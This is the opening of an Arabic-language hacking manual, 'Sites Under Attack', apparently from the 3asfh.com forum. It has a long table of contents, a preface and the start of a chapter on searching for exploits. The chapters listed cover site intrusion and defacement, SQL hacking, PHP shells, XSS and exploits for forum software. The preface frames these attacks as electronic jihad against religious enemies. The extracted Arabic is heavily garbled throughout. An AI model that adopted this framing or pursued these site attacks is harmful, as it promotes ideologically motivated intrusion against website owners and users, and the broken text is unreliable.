You are on page 1of 259

hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.

com/vb

١
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻮﯾﺎ ت‬
‫ﺎﻟﻤ ﺤ‬
‫ﻘـــﺪﻣـــﺔ‪.‬‬‫‪ .١‬ﻣ‬
‫• ﺎﻟﻔ ﺼﻞا ﻷ و ل ))ﻣﻬﺎ را ت وﻣ ﺼﻄﻠﺤﺎ تأ ﺳﺎ ﺳﯿﺔ((‬
‫‪ .٢‬ﻛﯿﻔﯿﺔاﻟﺒﺤﺚﻓﻲاﻹﻧﺘﺮﻧﺖ‪.‬‬
‫ﺋﻲ‪.‬‬ ‫‪ .٣‬ﺎﻹﺧﺘﺮاقاﻟﻌﺸﻮا‬
‫ﻤﻮاﻗﻊ‪.‬‬ ‫ﻤﺜﻠﻰﻓﻲاﺧﺘﺮاقاﻟ‬ ‫ﻘﺔاﻟ ﺼﺤﯿﺤﺔ واﻟ‬ ‫‪ .٤‬ﺎﻟﻄﺮﯾ‬
‫‪ .٥‬ﻣﻌﻠﻮﻣﺎ ت ﻋ ﻦاﻟـ‪.DNS‬‬
‫‪ .٦‬ﺷﺮح ﻣﻠ ﻒ ‪.htaccess‬‬
‫ﻤﻠﻔﺎ ت ‪.FTP‬‬ ‫ﻘﻞاﻟ‬ ‫‪ .٧‬ﻧﻈﺎم ﻧ‬
‫‪ .٨‬ﺎﻹﺧﺘﺮاق ﻋ ﻦ ﻃﺮﯾﻖ ‪.FTP‬‬
‫‪ .٩‬ﺑﺮ وﺗﻮﻛﻮ ل ﺧﺪﻣﺔ ‪.Finger‬‬
‫‪ .١ ٠‬ﺷﺮحاﻟـ ‪.secure shell‬‬
‫‪ .١ ١‬ﺷﺮح ﻣﻌﻨﻰاﻟـ ‪.Buffer Overflows‬‬
‫‪.١ ٢‬ﺎﻟـ‪ CGI‬وﻋﻼﻗﺘﻬﺎ ﺑﺎﻹﻧﺘﺮﻧﺖ‪.‬‬
‫ﻤﺎﯾﺔ وااﻟﺘﺨﻔﻲ((‬ ‫• ﺎﻟﻔ ﺼﻞاﻟﺜﺎﻧﻲ))اﻟﺤ‬
‫‪.١ ٣‬ا ﻷﻣ ﻦ و)))اﻟﺘﺨﻔﻲ(((ﻓﻲاﻹﻧﺘﺮﻧﺖ‪.‬‬
‫ﻤﺎﯾﺔ ﻫﻮﯾﺘﻚﻓﻲاﻟﻨﺖ‪.‬‬ ‫‪ .١ ٤‬ﺣ‬
‫ﻤﻲ ﻧﻔ ﺴﻚ وﻏﻄﻲاﻓﻌﺎﻟﻚ‪.‬‬ ‫‪.١ ٥‬ﺎﺣ‬
‫ﻤﻨﺘﺪﯾﺎ ت‪.‬‬ ‫ﻤﺎﯾﺔاﻟ‬ ‫‪ .١ ٦‬ﺣ‬
‫ﺒﻜﺎ ت‪.‬‬‫‪.١ ٧‬ﺄﻣ ﻦاﻟﺸ‬
‫ﻤﻮاﻗﻊ‪.‬‬ ‫ﺋﯿ ﻦﻓﻲاﺧﺘﺮاقاﻟ‬ ‫ﺒﺘﺪ‬ ‫ﻤ‬ ‫ﻤﺔ ﻟﻠ‬ ‫‪ .١ ٨‬ﻣ ﺼﻄﻠﺤﺎ ت ﻣﻬ‬
‫ﻤﻮاﻗﻊ‪.‬‬ ‫‪.١ ٩‬ﺪاﯾﻨﺎﻣﯿﻜﯿﺔﺗﺪﻣﯿﺮاﻟ‬
‫ﻤﻮاﻗﻊ‪.‬‬ ‫‪ .٢٠‬ﺷﺮح ﺑﺮﻧﺎﻣﺞاﻟﺪ رة ﻟﺘﺪﻣﯿﺮاﻟ‬
‫ﻤﻮاﻗﻊ ﺑﺪ و ن ﺑﺮاﻣﺞ‪.‬‬ ‫‪.٢١‬ﺗﺪﻣﯿﺮاﻟ‬
‫‪ .٢٢‬ﻣﻌﻠﻮﻣﺎ ت ﻋ ﻦ ‪.Routing in the Internet‬‬
‫ﻤﺔ((‬‫ﻘﺘﻄﻔﺎ ت ﻋ ﻦاﻟ ﺴﯿﺮﻓﺮا ت وا ﻷﻧﻈ‬ ‫• ﺎﻟﻔ ﺼﻞاﻟﺜﺎﻟﺚ))ﻣ‬
‫د )اﻟﺠﺰ ءا ﻷ و ل(‪.‬‬ ‫‪.٢٣‬اﻹﺧﺘﺮاق ﻋ ﻦ ﻃﺮﯾﻖاﻟﯿﻮﻧﯿﻜﻮ‬
‫د )اﻟﺠﺰ ءاﻟﺜﺎﻧﻲ(‪.‬‬ ‫‪.٢٤‬ﺎﻹﺧﺘﺮاق ﻋ ﻦ ﻃﺮﯾﻖاﻟﯿﻮﻧﯿﻜﻮ‬
‫د‪.‬‬‫دة ﻣ ﻦﺛﻐﺮا تاﻟﯿﻮﻧﯿﻜﻮ‬ ‫‪ .٢٥‬ﻣﻌﻠﻮﻣﺎ ت ﻋﺎﻣﺔ ﻋ ﻦ ﻛﯿﻔﯿﺔاﻻ ﺳﺘﻔﺎ‬
‫‪.٢٦‬ﺎﻟﺪﻟﯿﻞاﻟﻜﺎﻣﻞ ﻹﺧﺘﺮاق ﺳﯿﺮﻓﺮ ‪.IIS‬‬
‫ﻤﻖﻓﻲاﻟـ‪.UniCode‬‬ ‫‪.٢٧‬ﺪ را ﺳﺔ ﻣﻔ ﺼﻠﺔ وﺑﻌ‬
‫د‪.‬‬ ‫ﻤﻠﯿﺔاﻹﺧﺘﺮاق ﺑﻮا ﺳﻄﺔاﻟﯿﻮﻧﯿﻜﻮ‬ ‫‪.٢٨‬ﺗﺪ رﯾ ﺐ ﻋﻠﻰ ﻋ‬
‫‪.٢٩‬ﺪ ر س ﻣﻔ ﺼﻞ ﻋ ﻦاﻟﻜﻮﻛﯿﺰ‪.‬‬
‫ﻤﻮاﻗﻊاﻟﺘﻲﺗﺪﻋﻢاﻟﻔﺮ وﻧﺖ ﺑﯿﺞ‪.‬‬ ‫ﻤﺔ ﻋ ﻦاﻟ‬ ‫‪ .٣٠‬ﻣﻌﻠﻮﻣﺎ ت ﻣﻬ‬
‫ﻤﻮاﻗﻊ ﺑﺜﻐﺮةاﻟﻔﺮ وﻧﺖ ﺑﯿﺞ‪.‬‬ ‫‪ >) .٣١‬س&ج<(ﻓﻲاﺧﺘﺮاقاﻟ‬
‫ﻤﻮﻗﻊ‪.‬‬ ‫‪ .٣٢‬ﺷﺮح ﺑﺮﻧﺎﻣﺞ ‪ Shadow Scan Security‬ﻟﺘﺤﻠﯿﻞاﻟ‬
‫ﻤﺔاﻟﺘﺸﻐﯿﻞ‪.‬‬ ‫دﻓﻲأﻧﻈ‬ ‫ﺒﺎ ﺳﻮ ر‬ ‫د ﻣﻠ ﻒاﻟ‬ ‫‪.٣٣‬ﺎﻣﺎﻛ ﻦ و ﺟﻮ‬
‫ﻤﻮﻗﻊ )اﻟﺠﺰ ءا ﻷ و ل(‪.‬‬ ‫‪.٣٤‬ﺎﺧﺘﺮاقاﻟ‬
‫ﻤﻮاﻗﻊ )اﻟﺠﺰ ءاﻟﺜﺎﻧﻲ(‪.‬‬ ‫‪.٣٥‬ﺎﺧﺘﺮاقاﻟ‬
‫ﻤﻮاﻗﻊ )ﻣﺘﻮ ﺳﻂ(‪.‬‬ ‫‪.٣٦‬ﺪ ر سﻓﻲاﺧﺘﺮاقاﻟ‬
‫‪.٣٧‬ﺎﺧﺘﺮاقاﻟـ‪.SQL‬‬
‫‪.٣٨‬ﺪ ر س ﻣﻔ ﺼﻞ ﻋ ﻦاﻟـ‪.SQL‬‬
‫ﻤﻮاﻗﻊ‪.‬‬ ‫‪.٣٩‬ﺪ ر س ﻹﺣﺘﺮا فاﻟﻬﺎكﻓﻲاﺧﺘﺮاقاﻟ‬
‫ﻤﻮاﻗﻊ‪.‬‬ ‫‪.٤٠‬ﺎ ﺳﺘﻐﻼ ل ﻟﯿﻨﻜ ﺲﻓﻲاﺧﺘﺮاقاﻟ‬
‫ﻤﻮاﻗﻊ ﻋ ﻦ ﻃﺮﯾﻖ ﻟﯿﻨﻜ ﺲ‪.‬‬‫‪ .٤١‬ﺷﺮح ﻣﻔ ﺼﻞ ﻣ ﻦا ﻷﻟ ﻒ إﻟﻰاﻟﯿﺎ ءﻓﻲاﺣﺘﺮا فاﺧﺘﺮاقاﻟ‬
‫‪.٤٢‬ﺪ ر س ﻋ ﻦاﻟـ‪) PHP Shell‬اﻟﺠﺰ ءا ﻷ و ل(‪.‬‬
‫‪.٤٣‬ﺪ ر س ﻋ ﻦاﻟـ‪) PHP Shell‬اﻟﺠﺰ ءاﻟﺜﺎﻧﻲ(‪.‬‬

‫‪٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬
‫‪.٤٤‬ﺪ ر س ﻋ ﻦاﻟـ‪) PHP Shell‬اﻟﺠﺰ ءاﻟﺜﺎﻟﺚ(‪.‬‬
‫داة ‪.anmap‬‬ ‫‪ .٤٥‬ﺷﺮحأ‬
‫ﻘﺔﻹﻗﺘﺤﺎماﻟ ﺴﯿﺮﻓﺮا ت ﺑﺪ و نﺛﻐﺮا ت‪.‬‬ ‫‪ .٤٦‬ﻃﺮﯾ‬
‫‪.Cross Site Scripting .٤٧‬‬
‫دﺗﺪﻣﯿﺮ ﺳﺠﻞاﻟﺰ وا ر‪.‬‬ ‫‪.٤٨‬ﻛﻮ‬
‫ﺒﻪ ﻣﻔ ﺼﻞ ﻋ ﻦاﻟﺜﻐﺮا ت‪.‬‬ ‫‪ .٤٩‬ﺷﺮح ﺷ‬
‫‪.٥ ٠‬ﻛﯿ ﻒﺗ ﺴﺘﺨﺪماﻟﺜﻐﺮا ت‪.‬‬
‫ﺋﯿﻠﯿﺔ ﻣﻊ ﻫﺬهاﻟﺜﻐﺮة‪.‬‬ ‫ﻤﻮاﻗﻊاﻹ ﺳﺮا‬ ‫ﻤﺘﻊ ﺑﺈﺧﺘﺮاقاﻟ‬ ‫‪.٥ ١‬ﺗ‬
‫‪.٥ ٢‬ﺛﻐﺮة ﻧﯿﻮك‪.‬‬
‫‪.٥ ٣‬ﺛﻐﺮة ‪.Chunked‬‬
‫ﻤﻨﺘﺪﯾﺎ ت ﻣ ﻦ ﻧﻮ ع ‪.vBulletin2,2,0‬‬ ‫‪.٥ ٤‬ﺎﺧﺘﺮاقاﻟ‬
‫‪.٥ ٥‬ﺛﻐﺮةﻓﻲ ﻣﻨﺘﺪﯾﺎ ت‪.vBulletin 2,2,9‬‬
‫‪.٥ ٦‬ﺎﺧﺘﺮاق ﻣﻨﺘﺪﯾﺎ ت ‪.phpbb 2.0.0‬‬
‫ﻤﻮاﻗﻊ‪.‬‬ ‫ﻤﯿﻠﺔﻓﻲ ‪php‬ﻓﻲاﻟ‬ ‫‪.٥ ٧‬ﺛﻐﺮة ﺟ‬
‫‪.٥ ٨‬ﺛﻐﺮةﻓﻲ ‪.php nuke‬‬
‫‪.٥ ٩‬ﺛﻐﺮهﻓﻲ ‪.Bandmin 1.4‬‬
‫ﻤﻨﺘﺪﯾﺎ ت‪.‬‬ ‫‪.٦٠‬ﺛﻐﺮةﻓﻲ ﻧﻮ ع ‪ XMB‬ﻣ ﻦاﻟ‬
‫‪ .٦١‬ﺷﺮحﺛﻐﺮة ‪.philboard‬‬
‫‪ .٦٢‬ﺷﺮحﺛﻐﺮة ‪.uploader.php‬‬
‫ﻤﻨﺘﺪﯾﺎ تاﻟﻌﺮﺑﯿﺔ ﻟﻠﻬﺎﻛﺮ‪.‬‬ ‫‪.٦٣‬ﺄﻓ ﻀﻞاﻟ‬
‫‪.٦٤‬ﺄﻓ ﻀﻞ ﻣﻮاﻗﻊا ﻷﻣ ﻦ واﻟﻬﺎكاﻹﻧﺠﻠﯿﺰﯾﺔ‪.‬‬
‫ﻤﺔ‪.‬‬ ‫‪.٦٥‬اﻟﺨﺎﺗ‬

‫‪٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺑﺴﻢا ﷲاﻟ ﺮ ﺣﻤﻦاﻟ ﺮ ﺣﯿﻢ‬


‫اﻟ ﺤﻤﺪ ﷲ رباﻟﻌﺎﻟﻤﯿﻦ واﻟﺼﻼة واﻟﺴﻼماﻷﺗﻤﺎناﻷﻛﻤﻼن ﻋﻠﻰ ﺳﯿﺪاﻟﺜﻘﻼن وﻫﺎدياﻻﻧ ﺲ واﻟﺠﺎن ﻧﺒﯿﻨﺎ ﻣ ﺤﻤﺪ‬
‫ﺳﯿﺪ وﻟﺪ ﻋﺪﻧﺎن وﻋﻠﻰاﻟﻪ و ﺻ ﺤﺒﺔ وﺳﻠﻢﺗﺴﻠﯿﻤﺎﻛﺜﯿ ﺮا ‪....‬‬
‫ﺘﻨﺎاﻟ ﺤﺎﻟﻲا ﺣﺒﺒﻨﺎان ﯾﻜﻮنﻟﻨﺎ‬‫ﻗ‬‫ﻣﻦ ﻣﻨﻄﻠ ﻖاﻫﻤﯿﺔﻫﺬااﻟﻌﻠﻢ واﻟﺬي ﻧ ﺤﻦﻓﻲا ﺣﻮج ﻣﺎ ﻧﻜﻮناﻟﯿﻪاﻻنﻓﻲ و‬
‫ﺘﻮا ﺿﻊ ﻫﺬا واﻟﺬي ﻧﺴﺄ لا ﷲ ﯾﻮﻓﻘﻨﺎ‬ ‫ﺘﺎبﺑﺬرة ﻋﻤﻠﻨﺎاﻟﻤ‬ ‫ﺘﻄﯿﻊﻓﻜﺎن ﻫﺬااﻟﻜ‬ ‫ﻧﺼﯿﺐﻓﻲاﻟﺠﻬﺎداﻻا ﷲﺑﻘﺪر ﻣﺎ ﻧﺴ‬
‫وان ﯾﺴﺪدﻧﺎﻟﻤﺎﻓﯿﻪاﻟﺨﯿ ﺮ واﻟﻨﻔﻊﻟﻜ ﻞ ﻣﻦارادان ﯾﻌﻠﻲ دﯾﻦا ﷲﻓﻲ ﻫﺬااﻟﻤﺠﺎ لﻓﻠﻘﺪﺗﻜﺎﻟﺒ ﺖاﻋﺪا ءا ﷲ ﻋﻠﯿﻨﺎ‬
‫ﺘﻌﺪادﻟﻠﻤﻮاﺟﻬﺔ واﻋﺪاد‬ ‫ﺘ ﺮوﻧﯿﺔﺗﻐﺰوﻧﺎ ﻣﻦﻛ ﻞ ﺻﻮب وﻧﺎ ﺣﯿﺔﻓﯿﺠﺐاﻻﺳ‬ ‫ﻣﻦﻛ ﻞ ﺟﺎﻧﺐ وﺑﺪأ تاﻟ ﺤ ﺮوباﻻﻟﻜ‬
‫ﺘﻢ ﻣﻦﻗﻮة وﻣﻦ رﺑﺎطاﻟﺨﯿ ﻞﺗ ﺮﻫﺒﻮنﺑﻪ ﻋﺪوا ﷲ‬ ‫ﺘﻄﻌ‬ ‫اﻟﻌﺪة ﻣﻦ ﻣﻄﻠ ﻖﻗﻮ لا ﷲﺗﻌﺎﻟﻰ ))وأﻋﺪواﻟﻬﻢ ﻣﺎاﺳ‬
‫وﻋﺪوﻛﻢ ((ﻓﺎ ﺣﺒﺒﻨﺎان ﻧﺒﺪأﻓﻲ ﺳﻠﺴﻠﺔﺗﻌﻠﯿﻤﯿﺔ ﻫﺪﻓﻬﺎ ﻣﺎﻗﺪ ذﻛ ﺮﻧﺎه ﺳﺎﺑﻘﺎ ﻣﻦﺗﻘﺪﯾﻢ ﯾﺪاﻟﻌﻮن واﻟﻤﺴﺎﻋﺪةﺑﻤﺎ‬
‫ﺘﻰ ﻧﻜﻮن ﯾﺪا وا ﺣﺪة ﻋﻠﻰاﻋﺪاﺋﻨﺎ ‪....‬‬ ‫ﺘﺢا ﷲ ﻋﻠﯿﻨﺎ وﻋﻠﻰا ﺧﻮاﻧﻨﺎ ﺣ‬ ‫ﻓ‬
‫ﺘﻌﺎد ﻋﻦﻛ ﻞ ﻣﺎ ﯾﺴﻤﻰﺑﺎﻟﺒ ﺮاﻣ ﺞ‬‫ﺘ ﺮﻛﯿﺰ ﻋﻠﻰ دراﺳﺔﻫﺬااﻟﻌﻠﻢ دراﺳﺔ واﻓﯿﺔ واﻻﺑ‬ ‫ﺘﺎباﻟ‬‫ﻓﺎ ﺣﺒﺒ ﺖﻓﻲ ﻫﺬااﻟﻜ‬
‫ﺘﻘﻨﻪ ﻋﻠﻰاﻻﻧﻈﻤﺔ واﻟﺸﺒﻜﺎ ت‬ ‫ﻓ ﻀ ﺮرﻫﺎاﻛﺒ ﺮ ﻣﻦ ﻧﻔﻌﻬﺎ وﻟﻨﺒﺪأ ﺳﻮﯾﺔﺑﺎﻟﺪراﺳﺔاﻟﻮاﻓﯿﺔاﻟﻤ ﺮﻛﺰة واﻟﻤ‬
‫ﺘ ﺮوﻧﯿﺔ و ﺣﻤﺎﯾﺔاﻧﻔﺴﻨﺎﻗﺒ ﻞﻛ ﻞ ﺷﺊﻓﻲ ﻫﺬااﻟﻌﺎﻟﻢ‬ ‫ﺘﻮﺳﻊﻓﯿﻬﺎﻓﻬﻲ ﻃ ﺮﯾﻘﻨﺎﻟﻠﺴﯿﻄ ﺮةاﻻﻟﻜ‬ ‫واﻟﺴﯿ ﺮﻓ ﺮا ت واﻟ‬
‫ﺘﻜﺎر ﻣﻦأﻋﺪا ءا ﷲ )‪. (......‬‬ ‫ﺘﻮ حاﻟﺬي ﯾﺴﯿﻄ ﺮ ﻋﻠﯿﻪﻗ ﺮاﺻﻨﺔ اﻻ ﺣ‬ ‫اﻟﻤﻔ‬

‫وﻟﻘﺪﺑﺪأﻧﺎ وﻻ ﻧﺪﻋﻲاﻟﻜﻤﺎ لﻓﻤﻦارادﺗﻘﺪﯾﻢاﻟﻤﺴﺎﻋﺪةاو ﻣﺪ ﯾﺪاﻟﻌﻮنﺑﺎي ﻣﺸﺎرﻛﺔﻛﺎﻧ ﺖﻓﻠﻪاﻻﺟ ﺮ واﻟﺜﻮاب‬


‫ﺘ ﺮا حاو ﻧﺼﯿ ﺤﺔاو ﻣﺸﺎرﻛﺔ ﻣﻮ ﺿﻮﻋﯿﺔاو ‪...‬اﻟ ﺦ‬
‫ﻗ‬‫ﻣﻦا ﷲﺗﻌﺎﻟﻰ ﺳﻮا ءﺑﺎ‬

‫ﻗﻊﺗ ﺤ ﺖاﻟﻬﺠﻮم ‪Sites Under )) --‬‬ ‫ﺘﺎباﻟﺬيا ﻃﻠﻘﻨﺎ ﻋﻠﯿﻪاﺳﻢ ‪ --‬ﻣﻮا‬‫وﻫﺬا ﻫﻮاﻟﺠﺰ ءاﻷو ل ﻣﻦ ﻫﺬااﻟﻜ‬
‫ﺘ ﺮا ﺣﺎﺗﻜﻢ وﻣﺎﺗﺠﻮدﺑﻪاﻧﻔﺴﻜﻢﻓﻲ ﺧﺪﻣﺔ دﯾﻨﻜﻢ ‪....‬‬
‫ﻗ‬‫ﺘﻈﺎرا‬
‫ﻗﺒﻮااﻟﺠﺰ ءاﻟﺜﺎﻧﻲﻗ ﺮﯾﺒﺎ وﻓﻲاﻧ‬
‫‪ ((Attack‬وﺗ ﺮ‬

‫ﺘﺨﺪام ﺳﺊﻟﻤﺎ ﺳﻨﻘﺪﻣﻪﻟﻜﻢﻓﻬﻮ ﺳﻼ ح ذو ﺣﺪﯾﻦ ‪....‬اﻟﻠﻬﻢ ﻫ ﻞ‬


‫ﺘﻨﺎاﻣﺎما ﷲ ﻣﻦﻛ ﻞاﺳ‬
‫وا ﺧﯿ ﺮاﻓﺎﻧﺎ ﻧﺒ ﺮﯾﺊ ذﻣ‬
‫ﺑﻠﻐﻨﺎاﻟﻠﻬﻢﻓﺎﺷﻬﺪ ‪...‬‬

‫ﺘﺎﺑﺎﺗﻨﺎ وﻟﻜﻦ رأﯾﻨﺎ ﻣﻦاﻻ ﺧﻮة ﻣﻤﻦﻗﺪ‬ ‫ﺘﺎﺑﺎﺗﻨﺎﻓﺄ ﺿﻔﻨﺎ ﻣﻮا ﺿﯿﻊ ﻣﻦﻛ‬‫وﻟﻘﺪ ﻧﻮﯾﻨﺎانﺗﻜﻮناﻟﻤﻮا ﺿﯿﻊﻛﻠﻬﺎ ﻣﻦﻛ‬
‫ﺘﺒﻪﻓﻲﺑﻌ ﺾاﻟﻤﻮا ﺿﯿﻊﻟﺬﻟﻚﺗﻢارﻓﺎ ق‬ ‫ﺘﺒﻮهﻫﻮأﻓ ﻀ ﻞ ﻣﻤﺎ ﺳﻨﻜ‬ ‫ﺘﺢا ﷲ ﻋﻠﯿﻬﻢﻓﻲﺑﻌ ﺾاﻟﻤﺠﺎﻻ ت وﻣﺎﻛ‬ ‫ﻓ‬
‫ﺘﻌﺪﯾﻼ تاﻟﻠﻐﻮﯾﺔاواﻻ ﺧﻄﺎ ءاﻟﻮا ﺿ ﺤﺔ ‪.....‬‬ ‫ﺘﻌﻠ ﻖﺑﺎﻟ‬‫ﻣﻮا ﺿﯿﻌﻬﻢﻛﻤﺎ ﻫﻲ ﻣﻦ ﻏﯿ ﺮﺗﻌﺪﯾ ﻞاﻻ ﻣﺎ ﯾ‬
‫اذنﻓﻨﺼﯿﺒﻨﺎ ﻣﻦاﻟﻤﻮا ﺿﯿﻊ ﻣﺎ ﯾﻘﺎرب ‪ %٤٠‬واﻟﺒﻘﯿﺔ ﻫﻲ ﻣﻦ ﻧﺼﯿﺐا ﺧﻮاﻧﻨﺎ وﻧﺴﺎ لا ﷲﻟﻬﻢاﻻﺟ ﺮ واﻟﻤﺜﻮﺑﺔ‬
‫ﺘﻬﻢ ودﯾﻨﻬﻢاﻟﻰانﺗﻘﻮماﻟﺴﺎﻋﺔ ‪....‬‬ ‫ﺘﺨﺪماﻣ‬ ‫ﻋﻠﻰ ﻣﺎﻗﺪﻣﻮه ﻣﻦ ﻣﻌﻠﻮﻣﺎ ت ﺳ‬

‫وﺗﻘﺒﻠﻮاﺗ ﺤﯿﺎ تا ﺧﻮاﻧﻜﻢ‬


‫ـ‪- :‬‬
‫ﺟﻤﯿﻊاﻟ ﺤﻘﻮ ق ﻣ ﺤﻔﻮﻇﺔﻟ‬
‫‪+++++++++++++++++++‬‬
‫أﺑﻮ ﻣﺠﺎﻫﺪ – ‪+ hi_HaCkEr‬‬
‫‪+ MaXhAk2000‬‬
‫‪+++++++++++++++++++‬‬

‫ﺘﺪﯾﺎ تاﻟﻌﺎﺻﻔﺔ **** ‪http://www .3asfh.com/vb‬‬‫ﻣﻨ‬


‫ﻮا ﷲاﻟﻤﻮﻓ ﻖ‪،،،‬‬

‫‪٤‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

‫اﻟﻔ ﺼ ﻞ ا ﻷول‬
<><><><><><><><><><><><><><><><><><><><><>

‫))ﻣﻬﺎرا تو ﺻﻄﻠﺤﺎ ت‬
((‫أ ﺳﺎ ﺳﯿﺔ‬

٥
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﻛﯿﻔﯿﺔ اﻟﺒﺤﺚ ﰲ اﻹﻧﱰﻧﺖ "‬

‫‪$$$$$$$$$$$‬‬
‫ﺘﺮ‬
‫ﺎﻟﻜﺎﺗﺐ‪:‬ﺑﻼكﻫﻨ‬
‫‪$$$$$$$$$$$‬‬

‫ﻗﻊﻟﻜﻲ ﯾ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﺎ ﯾ ﺮﯾﺪ ﻣﻦ ﻣ ﺮاﺟﻊ ﺣﻮ ل ﻧﻈﺎم ﻣﻌﯿﻦاو‬


‫ﺘ ﺮ ق ﻣﻮا‬
‫ﻷﻫﻤﯿﺔ ﻫﺬااﻟﻤﻮ ﺿﻮ عﺑﺎﻟﻨﺴﺒﺔﻟﻜ ﻞ ﻣﺨ‬
‫ﻗﻊ ﻋﻦ‬‫ﻗﻲاﻟﻤﻮا‬ ‫ﺘﺮ‬‫ﺘﺨﺪاﻣﺎﻟﻤ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚ واﺳﺎﻟﻮا ﻣﺨ‬‫ﺑ ﺮﻧﺎﻣ ﺞ ﻣﻌﯿﻦاوﺛﻐ ﺮة ﻣﻌﯿﻨﺔﻓﻬﻮ ﻣﻦاﻛﺜ ﺮاﻟﻨﺎساﺳ‬
‫اﻫﻤﯿﺔ ﻣ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚﺑﺎﻟﻨﺴﺒﺔﻟﻬﻢ ‪.....‬‬

‫ﻗ ﺖ ﻣﻤﻜﻦ وﻻﺑﺪ‬ ‫ﻗﺼ ﺮ و‬ ‫ﺘ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﺎﺗ ﺮﯾﺪ وﺑﺎ‬


‫وﻻﺑﺪانﺗﻌﻠﻢان ﻣ ﺤ ﺮﻛﺎ تاﻟﺒ ﺤﺚ ﻣﺎ وﺟﺪ تاﺻﻼاﻻﻷﺟﻠﻚﻟ‬
‫ﺘﺨﺼ ﺺﻓﻲ ﻣﺠﺎ ل ﻣﻌﯿﻦ ﻋﻠﻰاﻷﻏﻠﺐﻓﻼﺗﺒ ﺤﺚ ﻣﺜﻼ ﻋﻦﺑ ﺮاﻣ ﺞﻫﻜ ﺮﻓﻲ ﻣ ﺤ ﺮﻛﺎ ت‬ ‫انﺗﻌ ﺮ فاﯾ ﻀﺎاناﻏﻠﺒﻬﺎ ﻣ‬
‫ﺑ ﺤﺚ ﺳﯿﺎﺳﯿﺔ ﻣﺜﻼ وﻫﻜﺬا ‪......‬‬

‫ﺘﺎﺑﺔاﻟﻜﻠﻤﺔ‬ ‫ﺘﺒ ﺖ وانﻛﻨ ﺖﻗﺪأ ﺧﻄﺄ تﻓﻲﻛ‬ ‫ﺘﺒ ﺮهاﻟﻤ ﺤ ﺮكاﻟﺬﻛﻲﻓﻬﻮ ﯾﻌ ﺮ ف ﻣﺎذاﻛ‬ ‫ﺑﺎﻟﻨﺴﺒﻪ ﻣﺜﻼﻟﻠﺠﻮﺟ ﻞاﻧﺎاﻋ‬
‫ﺘﺎﺋ ﺞاﻟﺒ ﺤﺚ ﺳﺆا ل ‪...‬ﻫ ﻞاﻧ ﺖﺗﻘﺼﺪﻛﺬا ‪ ...‬وﻏﺎﻟﺒﺎ ﻣﺎﺗﺠﺪاﻟﺬيﻛﻨ ﺖﺗﺒ ﺤﺚ‬ ‫ﻓﻬﻮﺗﻠﻘﺎﺋﯿﺎ ﺳﯿﻌﻄﯿﻚﻓﻲﺑﺪاﯾﺔ ﻧ‬
‫ﺘﯿﺠﺔاﻟﺒ ﺤﺚ ‪.‬‬ ‫ﻋﻨﻪﻓﻲاواﺋ ﻞ ﺻﻔ ﺤﺎ ت ﻧ‬
‫ﺘﻌﺎﻣ ﻞ‬ ‫ﺘﻲ ﯾ‬ ‫ﺘﺠﺎرﯾﻪاﻟ‬ ‫ﻗﻊاﻟ‬‫ﺘﺒ ﺮ ذﻛﺎ ءﺗﺠﺎري ﺣﯿﺚاﻧﻪ ﯾﻘﺪمﻟﻚاﻟﻤﻮا‬ ‫ﺑﺎﻟﻨﺴﺒﻪﻟﻠﯿﺎﻫﻮﻫﻮاﯾ ﻀﺎ ذﻛﻲ وﻟﻜﻦ ذﻛﺎﺋﻪ ﯾﻌ‬
‫ﻗﻊاﻟﻌﺎﻣﻪ وﻫﻲ ﻣﺎ‬ ‫ﺘﻌﺎﻣ ﻞ ﻣﻌﻬﺎاﻟﻤ ﺤ ﺮكﺛﻢاﻟﻤﻮا‬‫ﺘﻲ ﻻ ﯾ‬ ‫ﺘﺠﺎرﯾﻪاﻟ‬ ‫ﻗﻊاﻟ‬ ‫ﻣﻌﻬﺎ وﻓﯿﻬﺎ ﻣﺎﻛﻨ ﺖﺗﺒ ﺤﺚ ﻋﻨﻪﺛﻢاﻟﻤﻮا‬
‫ﻛﻨ ﺖﺗﺒ ﺤﺚ ﻋﻨﻪ ‪......‬‬
‫ﺘﺪﯾﺎ تاﺟﺪاﻟﻜﺜﯿ ﺮ‬ ‫ﺘﺪى وﻛﺬﻟﻚﻓﻲ ﺟﻤﯿﻊاﻟﻤﻨ‬ ‫ﺳﺆا ل ‪/‬اﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﻨﺎس واﻧﺎاﻻ ﺣﻈﻬﺎﻛﺜﯿ ﺮاﻓﻤﺜﻼ ﻋﻨﺪيﻓﻲاﻟﻤﻨ‬
‫ﺘ ﺮا ق واﻻﻣﺜﻠﺔﻛﺜﯿ ﺮة ‪....‬‬ ‫ﻣﺜﻼ ﯾﻄﻠﺐ ﻣﺜﻼﺑ ﺮﻧﺎﻣ ﺞاﻟﺴﺐ ﺳﻔﻦ !!!!!!!!ﻟﻤﺎذ ؟ﻫﺬا ﻣﺜﺎ ل ﻋﻦأﺷﻬ ﺮﺑ ﺮﻧﺎﻣ ﺞا ﺧ‬
‫ﺘﻄﯿﻊ‬ ‫ﻗﻊ ﻣﻌﯿﻦاو ﻏﯿ ﺮه وﻫﻮ ﯾﺴ‬ ‫ﺣﺴﻨﺎ ‪...‬ﻗﻠﻲاﻧ ﺖ ﻣﺎﻟﻔ ﺮ قﺑﯿﻨﻚ وﺑﯿﻦاﻟﺸﺨ ﺺاﻟﺬيﺗﻄﻠﺐ ﻣﻨﻪﺑ ﺮﻧﺎﻣ ﺞاو ﻣﻮ‬
‫ﺘﻄﯿﻊ ؟؟؟‬ ‫اﯾﺠﺎده واﻧ ﺖ ﻻﺗﺴ‬
